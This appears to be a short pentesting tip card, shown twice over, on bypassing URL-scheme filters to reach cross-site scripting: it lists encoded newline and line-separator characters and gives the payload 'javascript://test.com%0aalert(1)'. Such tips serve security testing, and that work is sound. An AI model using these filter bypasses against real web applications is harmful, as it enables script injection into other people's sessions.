XSS (Cross-Site Scripting)
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
🔹%0a
🔹%0d
🔹%E2%80%A8
🔹%E2%80%A9
✅ javascript://test.com%0aalert(1)Last updated
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
🔹%0a
🔹%0d
🔹%E2%80%A8
🔹%E2%80%A9
✅ javascript://test.com%0aalert(1)Last updated